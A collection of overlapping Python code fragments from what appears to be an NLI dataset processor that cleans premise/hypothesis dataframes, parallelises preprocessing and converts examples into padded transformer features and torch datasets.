"word :type x: str :return: word withou space in front :rtype: str \"\"\"",
"= df.copy() df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new",
"\"\"\" general fucntion to parallelize a function applied to a df \"\"\" df_split",
"s.apply(remove_first_space) # noqa remove space in the first position s = s.apply((lambda x:",
"dict_ = {\"premise\": new_p, \"hypothesis\": new_h, \"label\": label, \"o_index\": o_index} return pd.DataFrame(dict_) def",
"the colum 'text' :type data: pd.DataFrame :param text_column: colum text_column :type text_column: str",
"Apply preprocess on the input text from a NLI dataframe :param data: data",
"= np.array_split(df, n_cores) pool = Pool(n_cores) result = merge_lists(pool.map(func, df_split)) pool.close() pool.join() return",
"df, n_cores): df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_dev_examples,",
"as pd import numpy as np from multiprocessing import Pool import random from",
"as np from multiprocessing import Pool import random from transformers.data.processors.utils import InputExample, InputFeatures",
"frame with the colum 'text' :type data: pd.DataFrame :param text_column: colum text_column :type",
"\"\"\" df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new =",
"example) in enumerate(examples): len_examples = len(examples) inputs = self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids,",
"cached file %s\", cached_features_file) features = torch.load(cached_features_file) all_input_ids = torch.tensor( [f.input_ids for f",
"text_column=\"hypothesis\") label = data.label o_index = data.o_index dict_ = {\"premise\": new_p, \"hypothesis\": new_h,",
"token_type_ids else: input_ids = input_ids + ([pad_token] * padding_length) attention_mask = attention_mask +",
"s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa s = s.apply(remove_first_space) # noqa remove",
"mask_padding_with_zero else 1] * padding_length) + attention_mask token_type_ids = ([pad_token_segment_id] * padding_length) +",
"df2examples_parallel_train(self, df, n_cores): df_new = df.copy() if \"o_index\" not in df_new.columns: df_new.loc[:, \"o_index\"]",
"df_new return result def df2examples_parallel_dev(self, df, n_cores): df_new = df.copy() df_new.loc[:, \"o_index\"] =",
"parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return result def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"]",
"text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label o_index = data.o_index dict_ =",
"x: word :type x: str :return: word withou space in front :rtype: str",
"return result def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list = self.get_labels()",
"self._convert_examples_to_features, n_cores) return result def df2features(self, df, n_cores, mode): path = self.base_path +",
"in front :rtype: str \"\"\" try: if x[0] == \" \": return x[1:]",
"df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor for the any",
"InputFeatures from transformers.data.processors.utils import DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces =",
"= pre_process_nli_df(df) examples = self._create_examples(df, set_type) return examples def get_train_examples(self, df): return self.df2examples(df,",
"df, set_type): \"\"\"Creates examples for the training and dev sets.\"\"\" examples = []",
"padding_length) + attention_mask token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids else: input_ids =",
"the first position s = s.apply((lambda x: spaces.sub(\" \", x))) # noqa remove",
"guid = \"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples",
"def __init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"]",
"examples = [] n = df.shape[0] for i in range(n): example = df.loc[i]",
"\"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features in file: %s\", path) if mode.find(\"train\") > -1: examples",
"pd.DataFrame \"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label",
"file: %s\", path) if mode.find(\"train\") > -1: examples = self.df2examples_parallel_train(df, n_cores) else: examples",
"input text from a NLI dataframe :param data: data frame with the colum",
"any nli dataf frame in csv (columns = premise | hypothesis | label)\"\"\"",
"range(n): example = df.loc[i] name = example.o_index guid = \"{}-{}\".format(set_type, name) input_example =",
"input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self, examples): max_length",
"withou space in front :rtype: str \"\"\" try: if x[0] == \" \":",
"len(attention_mask), max_length) assert len(token_type_ids) == max_length, \"Error with input length {} vs {}\".format(",
"n_cores) del df_new return result def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self):",
"return result def df2features(self, df, n_cores, mode): path = self.base_path + \"{}_{}\".format(mode, self.max_length)",
"logging.info(\"Loading features from cached file %s\", cached_features_file) features = torch.load(cached_features_file) all_input_ids = torch.tensor(",
":param data: data frame with the colum 'text' :type data: pd.DataFrame :param text_column:",
"token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has 1 for real tokens and",
"with the colum 'text' :type data: pd.DataFrame \"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\") new_h",
"return df def parallelize_df2list(df, func, n_cores): \"\"\" general fucntion to parallelize a function",
"-1: examples = self.df2examples_parallel_train(df, n_cores) else: examples = self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples,",
"\"label\": label, \"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with",
"\"\"\" drop observations with label 'drop_label' \"\"\" return df.loc[df.label != drop_label] def clean_df(df,",
"from dataframe by lowering, removing non words, removing space in the first position",
"in enumerate(examples): len_examples = len(examples) inputs = self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids",
"hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"]",
"import numpy as np from multiprocessing import Pool import random from transformers.data.processors.utils import",
"= premise | hypothesis | label)\"\"\" def __init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"]",
"([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask token_type_ids = ([pad_token_segment_id] *",
"\"Error with input length {} vs {}\".format( len(attention_mask), max_length) assert len(token_type_ids) == max_length,",
"new_p = simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label o_index =",
"self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero label_map = self.get_label_map() features = [] for (ex_index, example)",
"input_ids + ([pad_token] * padding_length) attention_mask = attention_mask + \\ ([0 if mask_padding_with_zero",
"0 for padding tokens. Only real # tokens are attended to. attention_mask =",
"assert os.path.exists(cached_features_file) logging.info(\"Loading features from cached file %s\", cached_features_file) features = torch.load(cached_features_file) all_input_ids",
"(ex_index, example) in enumerate(examples): len_examples = len(examples) inputs = self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length)",
"frame with the colum 'text' :type data: pd.DataFrame \"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\")",
"x except IndexError: return x def simple_pre_process_text(data, text_column): \"\"\" preprocess all input text",
"space in the first position and removing double spaces :param data: data frame",
"import random from transformers.data.processors.utils import InputExample, InputFeatures from transformers.data.processors.utils import DataProcessor from torch.utils.data",
"label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self, examples): max_length = self.max_length pad_token = self.pad_token",
"= example.o_index guid = \"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example)",
"\"o_index\"] = df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new",
"label = data.label o_index = data.o_index dict_ = {\"premise\": new_p, \"hypothesis\": new_h, \"label\":",
"return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list = self.get_labels() label_map = {label: i",
"hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"]",
"result def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list = self.get_labels() label_map",
"examples): max_length = self.max_length pad_token = self.pad_token pad_token_segment_id = self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero",
"torch import os import pandas as pd import numpy as np from multiprocessing",
"to parallelize a function applied to a df \"\"\" df_split = np.array_split(df, n_cores)",
"= df.loc[i] name = example.o_index guid = \"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid, text_a=example.premise,",
"position and removing double spaces :param data: data frame with the colum 'text'",
"data frame with the colum 'text' :type data: pd.DataFrame :param text_column: colum text_column",
"to the sequence length. padding_length = max_length - len(input_ids) if self.pad_on_left: input_ids =",
"pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df def parallelize_df2list(df, func, n_cores): \"\"\" general fucntion",
"torch.tensor([f.label for f in features], dtype=torch.long) dataset = TensorDataset( all_input_ids, all_attention_mask, all_token_type_ids, all_labels)",
"df, n_cores, mode): path = self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features in file:",
"front :rtype: str \"\"\" try: if x[0] == \" \": return x[1:] else:",
"# noqa remove double spaces return s def pre_process_nli_df(data): \"\"\" Apply preprocess on",
"s def pre_process_nli_df(data): \"\"\" Apply preprocess on the input text from a NLI",
"label_list = self.get_labels() label_map = {label: i for i, label in enumerate(label_list)} return",
"= [] for (ex_index, example) in enumerate(examples): len_examples = len(examples) inputs = self.tokenizer.encode_plus(example.text_a,",
"tokens. Only real # tokens are attended to. attention_mask = [ 1 if",
"multiprocessing import Pool import random from transformers.data.processors.utils import InputExample, InputFeatures from transformers.data.processors.utils import",
"([0 if mask_padding_with_zero else 1] * padding_length) token_type_ids = token_type_ids + \\ ([pad_token_segment_id]",
"applied to a df \"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) result",
"the sequence length. padding_length = max_length - len(input_ids) if self.pad_on_left: input_ids = ([pad_token]",
"try: if x[0] == \" \": return x[1:] else: return x except IndexError:",
"df): return self.df2examples(df, \"train\") def get_dev_examples(self, df): return self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df,",
"and 0 for padding tokens. Only real # tokens are attended to. attention_mask",
"from transformers.data.processors.utils import DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile('",
"all_attention_mask = torch.tensor( [f.attention_mask for f in features], dtype=torch.long) all_token_type_ids = torch.tensor( [f.token_type_ids",
"pre_process_nli_df(data): \"\"\" Apply preprocess on the input text from a NLI dataframe :param",
"real # tokens are attended to. attention_mask = [ 1 if mask_padding_with_zero else",
"== max_length, \"Error with input length {} vs {}\".format( len(input_ids), max_length) assert len(attention_mask)",
"([pad_token] * padding_length) attention_mask = attention_mask + \\ ([0 if mask_padding_with_zero else 1]",
"# The mask has 1 for real tokens and 0 for padding tokens.",
"input length {} vs {}\".format( len(token_type_ids), max_length) label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids,",
"'text' :type data: pd.DataFrame \"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\")",
"= simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label o_index = data.o_index",
"df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor",
"example.o_index guid = \"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return",
"vs {}\".format( len(attention_mask), max_length) assert len(token_type_ids) == max_length, \"Error with input length {}",
"vs {}\".format( len(input_ids), max_length) assert len(attention_mask) == max_length, \"Error with input length {}",
"= s.apply((lambda x: spaces.sub(\" \", x))) # noqa remove double spaces return s",
"torch.load(cached_features_file) all_input_ids = torch.tensor( [f.input_ids for f in features], dtype=torch.long) all_attention_mask = torch.tensor(",
"position s = s.apply((lambda x: spaces.sub(\" \", x))) # noqa remove double spaces",
"return s def pre_process_nli_df(data): \"\"\" Apply preprocess on the input text from a",
"index \"\"\" df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new",
"label_map = {label: i for i, label in enumerate(label_list)} return label_map def _create_examples(self,",
"self.get_labels() label_map = {label: i for i, label in enumerate(label_list)} return label_map def",
"a function applied to a df \"\"\" df_split = np.array_split(df, n_cores) pool =",
"in file: %s\", path) if mode.find(\"train\") > -1: examples = self.df2examples_parallel_train(df, n_cores) else:",
"n_cores): result = parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return result def df2features(self, df, n_cores, mode):",
"n_cores): \"\"\" return clean version of the dataframe with the original index \"\"\"",
"IndexError: return x def simple_pre_process_text(data, text_column): \"\"\" preprocess all input text from dataframe",
"* padding_length) + token_type_ids else: input_ids = input_ids + ([pad_token] * padding_length) attention_mask",
"re import logging import torch import os import pandas as pd import numpy",
"else: input_ids = input_ids + ([pad_token] * padding_length) attention_mask = attention_mask + \\",
"self.base_path = hyperparams[\"base_path\"] def df2examples(self, df, set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df)",
"f in features], dtype=torch.long) all_token_type_ids = torch.tensor( [f.token_type_ids for f in features], dtype=torch.long)",
"base = [] for l in lists: base.extend(l) return base def parallelize_df2df(df, func,",
"with label 'drop_label' \"\"\" return df.loc[df.label != drop_label] def clean_df(df, n_cores): \"\"\" return",
"data: data frame with the colum 'text' :type data: pd.DataFrame :param text_column: colum",
":param text_column: colum text_column :type text_column: str \"\"\" s = data.loc[:, text_column].copy() s",
"df_split)) pool.close() pool.join() return result def remove_first_space(x): \"\"\" remove_first_space from word x :param",
"* padding_length) + input_ids attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length)",
"examples = self._create_examples(df, set_type) return examples def get_train_examples(self, df): return self.df2examples(df, \"train\") def",
"+ \\ ([0 if mask_padding_with_zero else 1] * padding_length) token_type_ids = token_type_ids +",
"logging import torch import os import pandas as pd import numpy as np",
"removing non words, removing space in the first position and removing double spaces",
"noqa remove double spaces return s def pre_process_nli_df(data): \"\"\" Apply preprocess on the",
"1 for real tokens and 0 for padding tokens. Only real # tokens",
"a df \"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) result = merge_lists(pool.map(func,",
"examples = self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores) torch.save(features, path) return path def",
"dataframe :param data: data frame with the colum 'text' :type data: pd.DataFrame \"\"\"",
"assert len(attention_mask) == max_length, \"Error with input length {} vs {}\".format( len(attention_mask), max_length)",
"= pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df def parallelize_df2list(df, func, n_cores): \"\"\" general",
"len(input_ids) if self.pad_on_left: input_ids = ([pad_token] * padding_length) + input_ids attention_mask = ([0",
"pd import numpy as np from multiprocessing import Pool import random from transformers.data.processors.utils",
"df.loc[df.label != drop_label] def clean_df(df, n_cores): \"\"\" return clean version of the dataframe",
"def pre_process_nli_df(data): \"\"\" Apply preprocess on the input text from a NLI dataframe",
"for l in lists: base.extend(l) return base def parallelize_df2df(df, func, n_cores): \"\"\" general",
"= hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"] def df2examples(self,",
"_convert_examples_to_features(self, examples): max_length = self.max_length pad_token = self.pad_token pad_token_segment_id = self.pad_token_segment_id mask_padding_with_zero =",
"numpy as np from multiprocessing import Pool import random from transformers.data.processors.utils import InputExample,",
"tokens and 0 for padding tokens. Only real # tokens are attended to.",
"== max_length, \"Error with input length {} vs {}\".format( len(attention_mask), max_length) assert len(token_type_ids)",
"len(input_ids) # Zero-pad up to the sequence length. padding_length = max_length - len(input_ids)",
"from cached file %s\", cached_features_file) features = torch.load(cached_features_file) all_input_ids = torch.tensor( [f.input_ids for",
"= self.mask_padding_with_zero label_map = self.get_label_map() features = [] for (ex_index, example) in enumerate(examples):",
"n_cores): df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores)",
"examples = self.df2examples_parallel_train(df, n_cores) else: examples = self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores)",
"df2examples_parallel_dev(self, df, n_cores): df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new,",
"all_labels = torch.tensor([f.label for f in features], dtype=torch.long) dataset = TensorDataset( all_input_ids, all_attention_mask,",
"colum text_column :type text_column: str \"\"\" s = data.loc[:, text_column].copy() s = s.apply(lambda",
"hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"] def df2examples(self, df, set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True) df =",
"features from cached file %s\", cached_features_file) features = torch.load(cached_features_file) all_input_ids = torch.tensor( [f.input_ids",
"df = pre_process_nli_df(df) examples = self._create_examples(df, set_type) return examples def get_train_examples(self, df): return",
"i, label in enumerate(label_list)} return label_map def _create_examples(self, df, set_type): \"\"\"Creates examples for",
"padding tokens. Only real # tokens are attended to. attention_mask = [ 1",
"return examples def _convert_examples_to_features(self, examples): max_length = self.max_length pad_token = self.pad_token pad_token_segment_id =",
"x def simple_pre_process_text(data, text_column): \"\"\" preprocess all input text from dataframe by lowering,",
"\": return x[1:] else: return x except IndexError: return x def simple_pre_process_text(data, text_column):",
"self._create_examples(df, set_type) return examples def get_train_examples(self, df): return self.df2examples(df, \"train\") def get_dev_examples(self, df):",
"filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with label 'drop_label' \"\"\" return df.loc[df.label != drop_label]",
"df.copy() df_new.loc[:, \"o_index\"] = df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores)",
"token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids else: input_ids = input_ids + ([pad_token]",
"examples def get_train_examples(self, df): return self.df2examples(df, \"train\") def get_dev_examples(self, df): return self.df2examples(df, \"dev\")",
"attention_mask = attention_mask + \\ ([0 if mask_padding_with_zero else 1] * padding_length) token_type_ids",
"= torch.tensor( [f.token_type_ids for f in features], dtype=torch.long) all_labels = torch.tensor([f.label for f",
"df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new return result",
"\\ ([pad_token_segment_id] * padding_length) assert len(input_ids) == max_length, \"Error with input length {}",
"= self.df2examples_parallel_train(df, n_cores) else: examples = self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores) torch.save(features,",
"= {label: i for i, label in enumerate(label_list)} return label_map def _create_examples(self, df,",
"= Pool(n_cores) df = pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df def parallelize_df2list(df, func,",
"= torch.load(cached_features_file) all_input_ids = torch.tensor( [f.input_ids for f in features], dtype=torch.long) all_attention_mask =",
"= s.apply(remove_first_space) # noqa remove space in the first position s = s.apply((lambda",
"drop_label] def clean_df(df, n_cores): \"\"\" return clean version of the dataframe with the",
"x: spaces.sub(\" \", x))) # noqa remove double spaces return s def pre_process_nli_df(data):",
"import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +') def merge_lists(lists): base = []",
"re.compile(' +') def merge_lists(lists): base = [] for l in lists: base.extend(l) return",
"\"\"\" s = data.loc[:, text_column].copy() s = s.apply(lambda x: x.lower()) s = s.apply((lambda",
"removing double spaces :param data: data frame with the colum 'text' :type data:",
"\"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with label 'drop_label'",
"= inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has 1 for real tokens and 0",
"max_length) assert len(attention_mask) == max_length, \"Error with input length {} vs {}\".format( len(attention_mask),",
"remove_first_space from word x :param x: word :type x: str :return: word withou",
"label, \"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with label",
"df \"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) result = merge_lists(pool.map(func, df_split))",
"level=logging.INFO) spaces = re.compile(' +') def merge_lists(lists): base = [] for l in",
"except IndexError: return x def simple_pre_process_text(data, text_column): \"\"\" preprocess all input text from",
"{} vs {}\".format( len(attention_mask), max_length) assert len(token_type_ids) == max_length, \"Error with input length",
"# Zero-pad up to the sequence length. padding_length = max_length - len(input_ids) if",
"features = [] for (ex_index, example) in enumerate(examples): len_examples = len(examples) inputs =",
"= self.get_label_map() features = [] for (ex_index, example) in enumerate(examples): len_examples = len(examples)",
"x[0] == \" \": return x[1:] else: return x except IndexError: return x",
"clean_df(df, n_cores): \"\"\" return clean version of the dataframe with the original index",
"input length {} vs {}\".format( len(input_ids), max_length) assert len(attention_mask) == max_length, \"Error with",
"examples.append(input_example) return examples def _convert_examples_to_features(self, examples): max_length = self.max_length pad_token = self.pad_token pad_token_segment_id",
"all_token_type_ids = torch.tensor( [f.token_type_ids for f in features], dtype=torch.long) all_labels = torch.tensor([f.label for",
"pool.join() return result def remove_first_space(x): \"\"\" remove_first_space from word x :param x: word",
"np.array_split(df, n_cores) pool = Pool(n_cores) df = pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df",
"len(token_type_ids), max_length) label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def examples2features_parallel(self,",
"= [] n = df.shape[0] for i in range(n): example = df.loc[i] name",
"max_length) label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def examples2features_parallel(self, examples,",
"def parallelize_df2list(df, func, n_cores): \"\"\" general fucntion to parallelize a function applied to",
"= torch.tensor( [f.input_ids for f in features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask for",
"InputExample, InputFeatures from transformers.data.processors.utils import DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces",
"= data.label o_index = data.o_index dict_ = {\"premise\": new_p, \"hypothesis\": new_h, \"label\": label,",
"self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features in file: %s\", path) if mode.find(\"train\") >",
"\"\"\" preprocess all input text from dataframe by lowering, removing non words, removing",
"= parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor for the any nli",
"label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def examples2features_parallel(self, examples, n_cores): result =",
"n_cores) torch.save(features, path) return path def features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading features from cached",
"= parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return result def get_labels(self): return [\"contradiction\", \"entailment\",",
"self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path",
"enumerate(label_list)} return label_map def _create_examples(self, df, set_type): \"\"\"Creates examples for the training and",
"{}\".format( len(token_type_ids), max_length) label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def",
"= df.index result = parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new return result def df2examples_parallel_dev(self,",
"the input text from a NLI dataframe :param data: data frame with the",
"self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero",
"str \"\"\" s = data.loc[:, text_column].copy() s = s.apply(lambda x: x.lower()) s =",
"- len(input_ids) if self.pad_on_left: input_ids = ([pad_token] * padding_length) + input_ids attention_mask =",
"dev sets.\"\"\" examples = [] n = df.shape[0] for i in range(n): example",
"= simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label o_index = data.o_index dict_ = {\"premise\": new_p,",
"del df_new return result def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list",
"examples2features_parallel(self, examples, n_cores): result = parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return result def df2features(self, df,",
"i for i, label in enumerate(label_list)} return label_map def _create_examples(self, df, set_type): \"\"\"Creates",
"get_dev_examples(self, df): return self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df, n_cores): df_new = df.copy() if",
"f in features], dtype=torch.long) dataset = TensorDataset( all_input_ids, all_attention_mask, all_token_type_ids, all_labels) return dataset",
"add_special_tokens=True, max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has 1 for",
"\"dev\") def df2examples_parallel_train(self, df, n_cores): df_new = df.copy() if \"o_index\" not in df_new.columns:",
"* padding_length) attention_mask = attention_mask + \\ ([0 if mask_padding_with_zero else 1] *",
"text_column :type text_column: str \"\"\" s = data.loc[:, text_column].copy() s = s.apply(lambda x:",
"from word x :param x: word :type x: str :return: word withou space",
"df.shape[0] for i in range(n): example = df.loc[i] name = example.o_index guid =",
"NLI dataframe :param data: data frame with the colum 'text' :type data: pd.DataFrame",
"func, n_cores): \"\"\" general fucntion to parallelize a function applied to a df",
"hypothesis | label)\"\"\" def __init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"]",
"attention_mask = [ 1 if mask_padding_with_zero else 0] * len(input_ids) # Zero-pad up",
"filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor for the",
"+ \\ ([pad_token_segment_id] * padding_length) assert len(input_ids) == max_length, \"Error with input length",
"os.path.exists(cached_features_file) logging.info(\"Loading features from cached file %s\", cached_features_file) features = torch.load(cached_features_file) all_input_ids =",
"== \" \": return x[1:] else: return x except IndexError: return x def",
"input_ids = input_ids + ([pad_token] * padding_length) attention_mask = attention_mask + \\ ([0",
"lowering, removing non words, removing space in the first position and removing double",
"= torch.tensor([f.label for f in features], dtype=torch.long) dataset = TensorDataset( all_input_ids, all_attention_mask, all_token_type_ids,",
"transformers.data.processors.utils import InputExample, InputFeatures from transformers.data.processors.utils import DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log',",
"get_label_map(self): label_list = self.get_labels() label_map = {label: i for i, label in enumerate(label_list)}",
"1 if mask_padding_with_zero else 0] * len(input_ids) # Zero-pad up to the sequence",
"* padding_length) assert len(input_ids) == max_length, \"Error with input length {} vs {}\".format(",
"= df.shape[0] for i in range(n): example = df.loc[i] name = example.o_index guid",
"text_column: str \"\"\" s = data.loc[:, text_column].copy() s = s.apply(lambda x: x.lower()) s",
"\"o_index\" not in df_new.columns: df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_train_examples, n_cores)",
"result def df2features(self, df, n_cores, mode): path = self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving",
"random from transformers.data.processors.utils import InputExample, InputFeatures from transformers.data.processors.utils import DataProcessor from torch.utils.data import",
"def df2features(self, df, n_cores, mode): path = self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features",
"\"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self,",
"0] * len(input_ids) # Zero-pad up to the sequence length. padding_length = max_length",
"drop_label='-'): \"\"\" drop observations with label 'drop_label' \"\"\" return df.loc[df.label != drop_label] def",
"n_cores) del df_new return result def df2examples_parallel_dev(self, df, n_cores): df_new = df.copy() df_new.loc[:,",
"+ token_type_ids else: input_ids = input_ids + ([pad_token] * padding_length) attention_mask = attention_mask",
"with input length {} vs {}\".format( len(input_ids), max_length) assert len(attention_mask) == max_length, \"Error",
"colum 'text' :type data: pd.DataFrame :param text_column: colum text_column :type text_column: str \"\"\"",
"the colum 'text' :type data: pd.DataFrame \"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\") new_h =",
"self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores) torch.save(features, path) return path def features2dataset(cached_features_file): assert",
"df, set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df) examples = self._create_examples(df, set_type) return",
"\"entailment\", \"neutral\"] def get_label_map(self): label_list = self.get_labels() label_map = {label: i for i,",
